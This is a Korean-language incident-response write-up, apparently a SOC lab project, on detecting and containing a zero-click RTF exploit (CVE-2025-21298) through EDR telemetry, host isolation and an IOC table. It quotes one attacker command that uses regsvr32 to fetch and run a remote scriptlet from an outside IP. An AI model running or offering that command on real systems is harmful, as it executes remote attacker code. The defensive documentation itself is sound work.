
EDR 텔레메트리 및 정적 악성코드 분석을 활용하여 Critical 심각도 제로클릭 RCE 익스플로잇(CVE-2025-21298)을 기술적으로 조사하고 호스트를 격리합니다.
이 프로젝트는 치명적(Critical) 심각도의 제로클릭 원격 코드 실행(RCE) 시도에 대한 종단 간 조사 및 차단 과정을 문서화한 것입니다. EDR 텔레메트리와 위협 인텔리전스를 활용하여 자동화된 방어 체계를 우회하고 명령 및 제어(C2) 통신을 수립한 "Living off the Land"(LotL) 공격을 식별했습니다.
이벤트 ID 314: Windows OLE 제로클릭 RCE 탐지를 식별했습니다. 초기 텔레메트리에서 악성 파일 mail.rtf가 경계 방어 체계에 의해 **허용(Allowed)**된 것으로 확인되어, 워크스테이션 'Austin'에서 활성 침해가 발생했음을 나타냈습니다.

VirusTotal에서 파일 해시의 평판 검사를 수행했습니다. 결과적으로 25/55 탐지율이 확인되었으며, 해당 파일이 CVE-2025-21298을 활용하는 무기화된 RTF임을 구체적으로 식별했습니다. 이 취약점은 사용자 상호작용 없이 Windows 미리 보기 창(Preview Pane)을 통한 원격 코드 실행을 허용합니다.

침해 후(post-exploitation) 동작을 식별하기 위해 호스트 'Austin'의 EDR 터미널 기록으로 전환했습니다. 악성 "Living off the Land"(LotL) 실행을 발견했습니다:
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe)를 활용해 원격 서버에서 악성 스크립틀릿(script-let)을 가져와 표준 애플리케이션 허용 목록과 기존 AV 시그니처를 우회했습니다.

NIST 인시던트 대응 프레임워크에 따라 즉각적인 차단이 우선시되었습니다. 영향을 받은 호스트에 **네트워크 격리(Network Isolation)**를 실행하여 C2 통신을 종료하고 기업 네트워크 내 측면 이동(lateral movement)을 방지했습니다.

해당 인시던트는 **참양성(True Positive)**으로 종결되었습니다. 공격자 IP(84.38.130.118)와 포렌식 증거를 위협 인텔리전스 및 방화벽 팀에 문서화하여 향후 발생을 방지하고자 했습니다.

| 유형 | 값 |
|---|
| C2 IP 주소 | 84.38.130.118 |
| 파일 해시 (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| 취약점 | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |